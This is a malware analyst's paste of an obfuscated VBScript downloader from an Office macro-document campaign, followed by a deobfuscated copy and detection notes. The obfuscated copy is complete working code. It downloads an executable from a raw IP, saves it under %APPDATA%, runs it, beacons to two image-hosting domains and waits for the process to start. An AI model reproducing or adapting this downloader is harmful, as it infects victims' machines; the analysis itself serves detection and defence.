- Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
- Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
- <== obfuscated: ===>
- ' Analyst notes (obfuscated copy). Every string is built from Chr() chains; the decoded
- ' values are taken from the deobfuscated copy further down this page.
- ' Overall behaviour visible here: one synchronous HTTP GET to a raw IP, the response body
- ' written to <APPDATA>\o8237423.exe and launched, then two more GETs whose responses are
- ' discarded, and a WMI poll loop that waits for the dropped process to appear.
- ' Detection points on this host: script host (the page says this came from an Office maldoc)
- ' making HTTP to 91.227.18.18, savepic.org and savepic.net; a file write under %APPDATA%
- ' named o8237423.exe; Shell.Application opening that file; repeated
- ' "Select * from Win32_Process" queries from the same script host.
- ' Chr() chain decodes to "Microsoft.XMLHTTP".
- dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
- ' Decodes to "Adodb.Stream"; used below to write the response body to disk.
- dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
- ' The only URL left in cleartext: synchronous (False) GET to the payload host.
- HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
- HGyu87f7Usf.Send
- ' "WScript.Shell" -> Environment("Process"): reads the process environment block.
- Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
- ' Decodes to "APPDATA".
- iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
- ' Drop path: <APPDATA>\o8237423.exe ("+" then "&" both concatenate here since the left operand is a string).
- iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
- ' Binary stream (type 1 = adTypeBinary); SaveToFile option 2 = adSaveCreateOverWrite,
- ' so an existing file at the drop path is silently replaced.
- with oUIOGuiwefff
- .type = 1
- .open
- .write HGyu87f7Usf.responseBody
- .savetofile iyUGUIvbuiwe7vhJ, 2
- end with
- ' "Shell.Application".Open on the dropped .exe runs it with its default handler; no arguments are passed.
- Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
- uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
- ' Second XMLHTTP/Stream pair. The stream jhvHVKfdg is never written or saved and the
- ' response body is never read, so this GET only generates traffic — presumably a
- ' check-in/beacon, but that cannot be confirmed from the script alone.
- dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
- dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
- ' Decodes to: GET http://savepic.org/7260406.jpg
- JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
- JHyygUBjdfg.Send
- ' Decodes to "winmgmts:\\.\root\cimv2": WMI connection to the local machine.
- Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
- ' Blocks until a process named o8237423.exe shows up in Win32_Process, re-querying
- ' every 3000 ms. There is no timeout, so the script host stays alive until the
- ' dropped binary is running.
- Do
- Running = False
- ' Decodes to "Select * from Win32_Process".
- Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
- For Each objItem In colItems
- ' Decodes to "o8237423.exe" (same name as the drop path above).
- If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101) Then
- Running = True
- Exit For
- End If
- Next
- If Not Running Then
- WScript.Sleep 3000
- End If
- Loop While Not Running
- ' Third XMLHTTP/Stream pair, same pattern as the second: response discarded, stream unused.
- dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
- dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
- ' Decodes to: GET http://savepic.net/6856149.jpg
- sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
- sdfsdfsdf.Send
- =========================================================================================================
- <== deobfuscated: ===>
- ' Analyst notes (deobfuscated copy). This is a reading aid, not a runnable script: the
- ' decoder dropped the quotation marks around every decoded string (e.g. createobject(Microsoft.XMLHTTP )),
- ' and line 22 of this copy carries a paste artifact ("Falsepasteb" for "False").
- ' Indicators visible in this listing: HTTP to 91.227.18.18/stat/get.php, savepic.org/7260406.jpg
- ' and savepic.net/6856149.jpg; file write to %APPDATA%\o8237423.exe; Shell.Application
- ' launch of that file; WMI "Select * from Win32_Process" polling every 3 s.
- dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
- dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
- ' Stage-1 download: synchronous GET, response body kept in memory until written below.
- HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
- HGyu87f7Usf.Send
- ' %APPDATA% read from the process environment; drop path becomes <APPDATA>\o8237423.exe.
- Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
- iyUGbuwerff = dfgfderer(APPDATA )
- iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
- ' Binary stream (type 1); SaveToFile option 2 = adSaveCreateOverWrite.
- with oUIOGuiwefff
- .type = 1
- .open
- .write HGyu87f7Usf.responseBody
- .savetofile iyUGUIvbuiwe7vhJ, 2
- end with
- ' Shell.Application.Open on the dropped .exe executes it; no arguments are passed.
- Set uyGUYhi8wef = CreateObject(Shell.Application )
- uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
- ' Second GET. jhvHVKfdg is never used and the response is never read, so this only
- ' produces network traffic — presumably a check-in, not confirmable from the script.
- dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
- dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
- JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
- JHyygUBjdfg.Send
- ' Local WMI connection, then an untimed wait for the dropped process to appear.
- Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
- Do
- ' Paste artifact: the obfuscated original on this page reads "Running = False".
- Running = Falsepasteb
- Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
- For Each objItem In colItems
- If objItem.Name = o8237423.exe Then
- Running = True
- Exit For
- End If
- Next
- If Not Running Then
- WScript.Sleep 3000
- End If
- Loop While Not Running
- ' Third GET, same pattern as the second: stream unused, response discarded.
- dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
- dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
- sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
- sdfsdfsdf.Send